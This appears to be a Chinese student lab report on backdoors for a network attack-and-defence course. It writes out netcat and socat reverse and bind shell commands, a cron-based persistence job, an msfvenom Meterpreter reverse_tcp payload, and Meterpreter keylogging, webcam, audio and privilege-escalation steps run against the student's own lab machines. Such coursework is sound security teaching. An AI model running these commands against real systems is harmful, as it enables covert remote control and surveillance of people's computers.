20145337马月《网络对抗技术》后门原理与实践

20145337马月《网络对抗技术》后门原理与实践

问题回答

• 例举你能想到的一个后门进入到你系统中的可能方式？
  • 安卓手机后门程序，能够远程卸载应用，清洗应用程序数据
• 例举你知道的后门如何启动起来(win及linux)的方式？
  • XP可将安装源光盘弹出，修改安装目录
  • windows 旧版本产生大量对外链接
  • 绕过系统防火墙
  • 安装嗅探工具，修改用户权限
  • 放大镜程序
  • 构造批处理脚本
• Meterpreter有哪些给你映像深刻的功能？
  • 功能强大，使用方便
• 如何发现自己有系统有没有被安装后门？
  • 安装杀毒软件，定期扫描，查看任务管理器中来路不明的自启动进程

实践准备

• 本机地址

• 虚拟机地址

1.Windows 获取Linux Shell

• 在本机使用ncat.exe -l -p 5337命令监听特定的端口，后在KALI使用网络检测工具nc，nc IP -e来反向连接Windows 5337端口
• 运行ls指令

2.Linux获得Windows Shell

• Linux运行nc 指令监听5337端口，windows反弹连接Linux
• 看到Windows的命令提示

• 利用nc传输数据
  
  

实验内容

一、使用netcat获取主机操作Shell，cron启动

• corn启动：Cron是Linux下的定时任务，每一分钟运行一次，根据配置文件执行预设的指令。

• Windows下使用ncat.exe -l -p 5337命令监听特定的端口

• 查看cron的帮助文档

• 使用crontab -e指令 编辑定时任务，设置为每小时第25分向Windows 5337 端口发送反弹连接

• 查看定时任务

• 稍等一下
  

• 在14:25时，输入指令，得到Shell
  

二、使用socat获取主机操作Shell.任务计划启动

• socat:socat是数据间的双向传输频道，每一个数据通道可能是一个文件,管道,设备套接字
• socat的地址类型很多，有ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl等。
• 在windows系统中打开控制面板—管理工具-任务计划程序-创建任务-填写任务名称后新建触发器，如下图所示。

• 在操作-程序或脚本中选择socat.exe文件路径，在添加参数中写tcp-listen:5337 exec:cmd.exe,pty,stderr,即将cmd.exe绑定到5337端口，同时将cmd.exe的stderr重定向到stdout上。

• 运行

• 在linux中输入socat - tcp:IP:端口号（前两次是没有关闭360安全卫士和360杀毒）

三、使用MSF meterpreter生成可执行文件，利用ncat或者socat传送到主机并运行获取主机Shell

• 在kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=虚拟机IP LPORT=端口号 -f exe >20145337.exe生成后门程序：

• ncat传输后门文件
  windows系统使用ncat.exe -l 端口号 > 保存文件名监听准备接受文件；

• kali系统使用ncat -nv 主机IP 端口号 < 文件名来发送指定文件；

• 查看主机中的后门软件

• 设置payload，并确认

• 开始监听

• ……未果，尝试了好几次，几次都因为粗心弄混了IP，重启后IP变了好气呀

• 启动成功，获得shell

四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

• 截获音频

• 时间只有2s,不是很清楚怎么设置时间
• 使用摄像头拍照（没有成功）

• 使用摄像头录像（好像也没成功）

• 截屏

• 击键记录

• 提权

实验总结与体会

• 通过这次实验，对网络安全的认识更进一步，实验自己也出现了不少问题，需要多次尝试和耐心解决